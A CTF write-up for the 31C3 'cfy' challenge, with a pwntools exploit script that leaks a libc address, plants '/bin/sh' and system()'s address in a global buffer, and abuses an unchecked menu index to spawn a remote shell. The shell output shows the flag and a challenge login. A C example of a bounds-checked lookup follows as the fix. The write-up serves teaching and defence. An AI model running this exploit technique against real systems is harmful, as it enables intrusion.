CTF/Writeup/31C3 CTF/cfy

MMA

cfy

    from pwn import *
    context(arch="amd64", os="linux")

    # Offsets and addresses used by the exploit (challenge binary and its libc build).
    SYSTEM_REL = 0x44b30      # offset of system() within libc
    BUF = 0x6010e0            # global input buffer in the binary
    PARSERS = 0x601080        # parser (function pointer) table, 16-byte entries

    #conn = process("./cfy")
    conn = remote("188.40.18.73", 3313)
    conn.recvuntil(b"quit\n")

    def peek_addr(addr):
        """Use menu option 2 to read the 8-byte value stored at addr."""
        conn.send(b"2\n")
        conn.recvuntil(b"number: ")
        conn.send(p64(addr) + b"\n")
        conn.recvuntil(b"hex: 0x")
        result = int(conn.recvline()[:-1], 16)
        conn.recvuntil(b"quit\n")
        return result

    # Leak a libc pointer from the GOT entry at 0x601018 and derive the libc base.
    libc_base = peek_addr(0x601018) - 0x70940
    system_addr = libc_base + SYSTEM_REL

    # Payload written into BUF: "/bin/sh" padded to 16 bytes, then the address
    # of system(), so that BUF+0x10 looks like a parser table entry.
    s = b"/bin/sh"
    s += b"\0" * (0x10 - len(s))
    s += p64(system_addr)

    # Menu number that indexes the parser table past its end, into BUF+0x10.
    conn.send(str((BUF + 0x10 - PARSERS) // 16).encode() + b"\n")
    conn.recvuntil(b"number: ")
    conn.send(s + b"\n")

    conn.interactive()

% python exploit.py
[+] Opening connection to 188.40.18.73 on port 3313: OK
[*] Switching to interactive mode
$ cat /home/cfy/flag
THANK YOU WARIO!

BUT OUR PRINCESS IS IN
ANOTHER CASTLE!

Login: cfy_pwn // 31C3_G0nna_keep<on>grynding
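The exploit works because the menu number is used as an index into the parser table without a range check, so an out-of-range value selects a fake entry that the attacker has placed in the input buffer. The block below is an added example, not code from the challenge binary or from this writeup: a hypothetical menu dispatch table in the same shape (16-byte entries holding a name and a handler pointer, an assumption) with an unchecked lookup beside a lookup that parses strictly and rejects any index outside the table. Entry names, handlers and sample inputs are constructed for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>

/* Hypothetical reconstruction of a menu dispatch table; the 16-byte entry
 * layout (name pointer + handler pointer) is an assumption, not taken from
 * the cfy binary. */
typedef void (*handler_fn)(const char *arg);

struct parser_entry {
    const char *name;
    handler_fn handler;
};

static void parse_dec(const char *arg) { printf("dec: %ld\n", strtol(arg, NULL, 10)); }
static void parse_hex(const char *arg) { printf("hex: 0x%lx\n", strtoul(arg, NULL, 16)); }

static const struct parser_entry parsers[] = {
    { "decimal", parse_dec },
    { "hex",     parse_hex },
};
#define N_PARSERS (sizeof(parsers) / sizeof(parsers[0]))

/* Unchecked lookup: whatever number the user typed becomes the index, so a
 * value past the end of the table reads a "handler" from whatever memory
 * follows it (in the writeup, the input buffer). Only safe for 1..N_PARSERS. */
handler_fn lookup_unchecked(long choice) {
    return parsers[choice - 1].handler;
}

/* Checked lookup: parse the whole line as a number, then reject anything
 * outside 1..N_PARSERS before touching the table. Returns NULL on rejection. */
handler_fn lookup_checked(const char *line) {
    char *end;
    errno = 0;
    long choice = strtol(line, &end, 10);
    if (errno != 0 || end == line || (*end != '\0' && *end != '\n'))
        return NULL;                                  /* not a clean number */
    if (choice < 1 || (unsigned long)choice > N_PARSERS)
        return NULL;                                  /* out of range: no table read */
    return parsers[choice - 1].handler;
}

int main(void) {
    /* Constructed sample lines standing in for what a user types at the menu. */
    const char *inputs[] = { "1\n", "2\n", "7\n", "-3\n", "x\n" };
    for (size_t i = 0; i < sizeof(inputs) / sizeof(inputs[0]); i++) {
        handler_fn h = lookup_checked(inputs[i]);
        if (h)
            h("255");
        else
            printf("rejected: %s", inputs[i]);
    }
    /* The unchecked variant is only ever called here with a valid index. */
    lookup_unchecked(1)("42");
    return 0;
}
```

The check is deliberately two-staged: a parse failure and an out-of-range value are both rejected before the table is read, so the index arithmetic itself can never point outside `parsers`. An input such as `7`, which the exploit relies on, yields NULL instead of a pointer read from the input buffer.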

CTF/Writeup/31C3 CTF/cfy (last updated 2014-12-30 05:47:47 by ytoku)